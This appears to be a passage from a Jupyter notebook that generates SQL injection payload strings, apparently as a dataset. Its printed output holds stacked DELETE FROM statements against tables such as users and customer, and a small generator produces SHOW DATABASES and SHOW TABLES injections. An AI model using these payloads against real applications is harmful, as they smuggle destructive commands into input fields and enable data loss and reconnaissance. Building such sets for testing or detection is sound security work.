 '"; DELETE FROM users WHERE username = jlfkFMLrrwDyT-- ',
 '"; DELETE FROM users WHERE password = TPsMf-- ',
 '"; DELETE FROM employee WHERE work_background = C6#',
 '"; DELETE FROM employee WHERE prefixname = KUeixAMt-- ',
 '"; DELETE FROM service WHERE name = bXIRNP#',
 '"; DELETE FROM customer WHERE tel = 0126388787#',
 '"; DELETE FROM customer WHERE customer_id = WgG3B9abx8#',
 '"; DELETE FROM customer WHERE email = ySPtv-- ',
 '"; DELETE FROM customer WHERE email = JuabcgK-- ',
 '"; DELETE FROM users WHERE username = PrruSWPDzmL# ',
 '"; DELETE FROM customer WHERE customer_id = 9ic5Ma3pPZOs4oI# ']

In [10]:
def randomShow(showList, last):
    gen=[]
    for i in range(10) :
        random_show=showList[random.randint(0, len(showList)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        gen.append("\"; " + "SHOW " + random_show + random_last)
    return gen

In [11]:
randomShow(showList, last)

['"; SHOW DATABASES#',
 '"; SHOW COLUME#',
 '"; SHOW DATABASES# ',
 '"; SHOW TABLES#',
 '"; SHOW DATABASES# ',
 '"; SHOW COLUME-- ',
 '"; SHOW COLUME#',
 '"; SHOW DATABASES-- ',
 '"; SHOW DATABASES# ',
 '"; SHOW COLUME# ']